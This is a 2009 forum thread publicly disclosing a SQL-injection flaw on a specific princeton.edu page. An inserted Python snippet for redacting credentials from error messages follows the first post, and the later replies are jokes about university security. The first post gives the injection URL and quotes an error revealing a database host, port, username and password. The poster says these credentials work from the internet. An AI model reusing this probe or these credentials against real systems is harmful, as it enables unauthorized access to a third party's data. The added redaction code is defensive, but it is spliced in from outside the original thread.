Where you should disclose your vulnerabilities. Go read
RFPolicy if you want to do responsible disclosure, and go here for when all else fails.
princeton.edu SQL injection/SQL username:password
Date: May 23, 2009 09:10AM
http://wws.princeton.edu/webmedia/list_speakers.xml?start=f'
generates the error:
RXML run error: Query failed:[...] <emit host="mysql://wws_web:WW$W3bUs3r@www-01dept.princeton.edu:3308/wws_webcasts"[...]
www-01dept.princeton.edu:3308 is connectable from the internet, and the user:password works.
Is this like a major issue since it's a well-known school?
--
Yeah I'm Dutch, sweeeeeeeeeeet.
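An added example, not part of the original post or of the site's code: the error above reaches the browser with the backend connection string in it, so this sketch shows an error handler that returns a generic body to the client and writes only a credential-redacted copy to the log. The function names, the incident reference format and the sample error line are assumptions made for illustration.

```python
import re
import uuid

# scheme://user:password@ inside any text. The password part is greedy within one
# whitespace/quote-delimited token, so it stops at the LAST '@' and also covers
# passwords containing '@' or '$'. Over-matching only redacts more, which is safe.
DSN_CREDENTIALS = re.compile(
    r"""\b([a-z][a-z0-9+.\-]*://)[^\s:/@"']+:[^\s"']+@""", re.IGNORECASE
)


def redact_dsn(text):
    """Replace user:password in connection URIs, keeping scheme and host for triage."""
    return DSN_CREDENTIALS.sub(r"\1[REDACTED]@", text)


def handle_backend_error(raw_error, incident_id=None):
    """Return (client_body, log_line) for a backend failure.

    The client sees no backend detail at all, only a reference that operators
    can match against the redacted log line.
    """
    incident_id = incident_id or uuid.uuid4().hex[:12]
    client_body = f"The request could not be processed (reference {incident_id})."
    log_line = f"incident={incident_id} {redact_dsn(raw_error)}"
    return client_body, log_line


# Constructed sample shaped like the error quoted in the post; the user, password,
# host and database name are placeholders, not values from the page.
SAMPLE_ERROR = (
    'RXML run error: Query failed: syntax error near "f\'" '
    '<emit host="mysql://app_user:Ex$mple@Pass@db.example.test:3308/app_db">'
)

if __name__ == "__main__":
    body, log = handle_backend_error(SAMPLE_ERROR)
    print(body)
    print(log)
```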
Re: princeton.edu SQL injection/SQL username:password
Date: May 24, 2009 11:45PM
hmm.. maybe my old UCLA boss, Karen M. is advising them on security.. she once told me "we're a school, we have nothing a hacker would want!".. :)
--thrill
---
It is not the degrees you hold, but the mind you possess. - thrill
Re: princeton.edu SQL injection/SQL username:password
Date: May 25, 2009 01:20AM
She wasn't a teacher.. she was the manager of the IT department in the Administrative Information Systems.. yeah.. those same people who do control the mainframe with all the SS#'s and other vital information on all students, staff and faculty.. but yes, we do not have anything a hacker would want.. oh yeah, and linux is a 'hobby' OS, it'll never be mainstream.. another choice quote from her in 1999.. :)
--thrill
---
It is not the degrees you hold, but the mind you possess. - thrill